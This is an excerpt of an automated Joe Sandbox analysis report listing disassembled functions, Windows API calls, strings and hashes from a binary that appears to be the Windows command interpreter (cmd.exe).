                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleMode_get_osfhandle
                                                                                                          • String ID: CMD.EXE
                                                                                                          • API String ID: 1606018815-3025314500
                                                                                                          • Opcode ID: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction ID: fd468a8ac3c0bd59290ead3d8ac601759793f8a8d5efaa6724b2c7ccc334a540
                                                                                                          • Opcode Fuzzy Hash: 9863d994e227a964b461aa116ba59a1d246fb461d9866754b2e1da54715f6750
                                                                                                          • Instruction Fuzzy Hash: A841C131A0B602CBE70A6B1CF895278FBA0BB8A759FC69235C50E43374DF3CA4549621

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConsoleTitlewcschr
                                                                                                          • String ID: /$:
                                                                                                          • API String ID: 2364928044-4222935259
                                                                                                          • Opcode ID: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction ID: 227b7eee1c5dd443d77245762dc61421dbb2f4786d64ac6fd2311f0bdfe25396
                                                                                                          • Opcode Fuzzy Hash: 18b5fc1b2ec7561f4a1e071935b117a16da6c033c327c323cb9fcfc49729d23f
                                                                                                          • Instruction Fuzzy Hash: 67C1D461E0A642C1EA56BB1DF4142B9E2A1FF41B58FD68131CA1E472F5EF3CE446D320

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 4291973834-0
                                                                                                          • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction ID: 555eb4d8b87a6275351531491a8030b73a457dcaf32e91daaf72d3d56b4d1a99
                                                                                                          • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                                                                                          • Instruction Fuzzy Hash: 10410A25A0A60382F797BB1CF980675A6A0FF5434CFD60935D91D876B0EF7CE8988760

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A28
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A66
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A7D
                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134A9A
                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7AB1349F1), ref: 00007FF7AB134AA2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentHeapStrings$AllocFreeProcessmemmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 1623332820-0
                                                                                                          • Opcode ID: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                          • Instruction ID: a9e80c28694a10f746b747df537636d32ba4124b05e65f17cfc8b87a08f56500
                                                                                                          • Opcode Fuzzy Hash: 7b7d5cd90c4b7fc4a2429fe2183f3170931abb96c0362b724e039f9c86480d2b
                                                                                                          • Instruction Fuzzy Hash: 80119425B1674182DE56AB0AF404039FBA0FB89F84B9A9134DE4F03774EF3DE4458750

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 1826527819-0
                                                                                                          • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction ID: 019e4a36202a8892074c6ec3ecea2e5bb6af1097df60689b23b877a28beb2d09
                                                                                                          • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                                                                                          • Instruction Fuzzy Hash: E9015B7190A682CAE6067B1DF4841B9FA60FB8A759FC66230D54F033B5EF3C90488720
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB131EA0: wcschr.MSVCRT(?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7AB150D54), ref: 00007FF7AB131EB3
                                                                                                          • SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7AB1292AC), ref: 00007FF7AB1330CA
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB1330DD
                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB1330F6
                                                                                                          • SetErrorMode.KERNELBASE ref: 00007FF7AB133106
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$FullNamePathwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1464828906-0
                                                                                                          • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction ID: 2d89adc9bfdb4b0abdb3cf7c1660ad7a02dc9fa31274631fe27a3d7e2a5deeef
                                                                                                          • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                                                                                          • Instruction Fuzzy Hash: 66312B22A0970582E6AAAF0DF04047DF660FB45B98FC69134DA4A433F0EF7DA8494320
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                                                          • API String ID: 2221118986-3416068913
                                                                                                          • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction ID: bf5751da2718d7e857140ec16c1f09f89e8cdd1b72c775048c7e9d6835c9b827
                                                                                                          • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                                                                                          • Instruction Fuzzy Hash: 2311CA61A0A74281EB55EB1DF1442B9A2509F84BACF954331DE6D473F5FE2CD4454320
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcschr
                                                                                                          • String ID: 2$COMSPEC
                                                                                                          • API String ID: 1764819092-1738800741
                                                                                                          • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction ID: 871d66ac56159339634f83c76faac090e6017405a0ab398c94d5d4044214133e
                                                                                                          • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                                                                                          • Instruction Fuzzy Hash: 9751A122A0A643C5FB67BB2DF49137AE2919F44B8CF864031DA4D426F5DE2DE8448761
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 4254246844-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$EnvironmentFreeProcessVariable
                                                                                                          • String ID:
                                                                                                          • API String ID: 2643372051-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 1591002910-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: DriveType
                                                                                                          • String ID: :
                                                                                                          • API String ID: 338552980-336475711
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • GetConsoleTitleW.KERNELBASE ref: 00007FF7AB135B52
                                                                                                            • Part of subcall function 00007FF7AB134224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134297
                                                                                                            • Part of subcall function 00007FF7AB134224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1342D7
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB1342FD
                                                                                                            • Part of subcall function 00007FF7AB134224: memset.MSVCRT ref: 00007FF7AB134368
                                                                                                            • Part of subcall function 00007FF7AB134224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB134380
                                                                                                            • Part of subcall function 00007FF7AB134224: wcsrchr.MSVCRT ref: 00007FF7AB1343E6
                                                                                                            • Part of subcall function 00007FF7AB134224: lstrcmpW.KERNELBASE ref: 00007FF7AB134401
                                                                                                          • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7AB135BC7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 497088868-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Concurrency::cancel_current_taskmalloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1412018758-0
                                                                                                          APIs
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: exit
                                                                                                          • String ID:
                                                                                                          • API String ID: 2483651598-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: DefaultUser
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358694519-0
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction ID: 795868105bf6d58b7335481bda7b5d96b348a82e119f48b0c6f2684bb872796d
                                                                                                          • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                                                                                          • Instruction Fuzzy Hash: 54F0B421B0A78140EA99A75AF541129A2909B88BE4B888330EA7D47BF9EE3CD4518700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsicmp$AttributeHeapProcThread$ErrorHandleLast$ListProcessmemset$towupper$CloseConsoleCtrlDeleteFreeHandlerInitializeUpdateiswspacewcschr$AllocCreateInfoStartup_wcsnicmp
                                                                                                          • String ID: $ /K $ /K %s$"%s"$.LNK$ABOVENORMAL$AFFINITY$BELOWNORMAL$COMSPEC$HIGH$LOW$MAX$MIN$NEWWINDOW$NODE$NORMAL$REALTIME$SEPARATE$SHARED$WAIT
                                                                                                          • API String ID: 1388555566-2647954630
                                                                                                          • Opcode ID: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                          • Instruction ID: 0d054a20ad1adc71f6f5a1606306d2d75f352b11923167fc3afa241d0b1f19ed
                                                                                                          • Opcode Fuzzy Hash: dd5574a000e659851fdbf238c5bb4c561f059835a701a2d9c9248c4e2a7a7e86
                                                                                                          • Instruction Fuzzy Hash: D6A2A571A0A78286E716AB29F4541B9F7A1FB89788FC28235DA4E477B4EF3CD504C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$FileSize_get_osfhandle_wcsnicmpiswspace
                                                                                                          • String ID: &<|>$+: $:$:EOF$=,;$^
                                                                                                          • API String ID: 511550188-726566285
                                                                                                          • Opcode ID: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                          • Instruction ID: 4d092aa1b6d767452928d62addd36d78165f43845b3b0fa0b32b9c6aa18d1318
                                                                                                          • Opcode Fuzzy Hash: 348cd75d81f2e43b90b1fdde602cc3fa7c7e8620821296db2d6a5e23a835ab51
                                                                                                          • Instruction Fuzzy Hash: AF52D232A0E652C6EB66AB1CF410679EAA4FB49748FC64135D94E437B4EF3CE845C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr$wcstol
                                                                                                          • String ID: delims=$eol=$skip=$tokens=$useback$usebackq
                                                                                                          • API String ID: 1738779099-3004636944
                                                                                                          • Opcode ID: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                          • Instruction ID: 673450ea1e185ad88fe3df3a836e3ae85d7e2da640e2822efdffd122f525369c
                                                                                                          • Opcode Fuzzy Hash: ed9b4971405935f9cd70a6a1a32585b3fb37949906c07fe23bc6612a814efbe7
                                                                                                          • Instruction Fuzzy Hash: F8728031B1A682CAEB56AF69F4502BDB7A1FB4474CF824135CE0D577B4EE3CA8058760
                                                                                                          APIs
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147F44
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB147F5C
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147F9E
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB147FFF
                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148020
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148036
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148061
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB148075
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1480D6
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB1480EA
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB148177
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB14819A
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481BD
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481DC
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB1481FB
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB14821A
                                                                                                          • _wcsnicmp.MSVCRT ref: 00007FF7AB148239
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148291
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1482D7
                                                                                                          • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1482FB
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB14831A
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148364
                                                                                                          • RtlFreeHeap.NTDLL ref: 00007FF7AB148378
                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB14839A
                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1483AE
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB1483E6
                                                                                                          • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148403
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7AB148418
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
                                                                                                          • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                                                          • API String ID: 3637805771-3100821235
                                                                                                          • Opcode ID: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                          • Instruction ID: 287801347771346a5fc7ee7d88d3821e82213889c73c62665a8f6e6c3bbff494
                                                                                                          • Opcode Fuzzy Hash: e6cb887516591751d838279dfb6f73a977c9c7224b6493b327e80fb3c94782b6
                                                                                                          • Instruction Fuzzy Hash: 1BE1B571A066528AE712AF2DF440179FAA1FB49B98B868231DD1F437B0EF3CA445C720
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Filememset$Attributes$ErrorLast$AllocCopyFindFirstVirtualwcschr
                                                                                                          • String ID: %s$%s
                                                                                                          • API String ID: 3623545644-3518022669
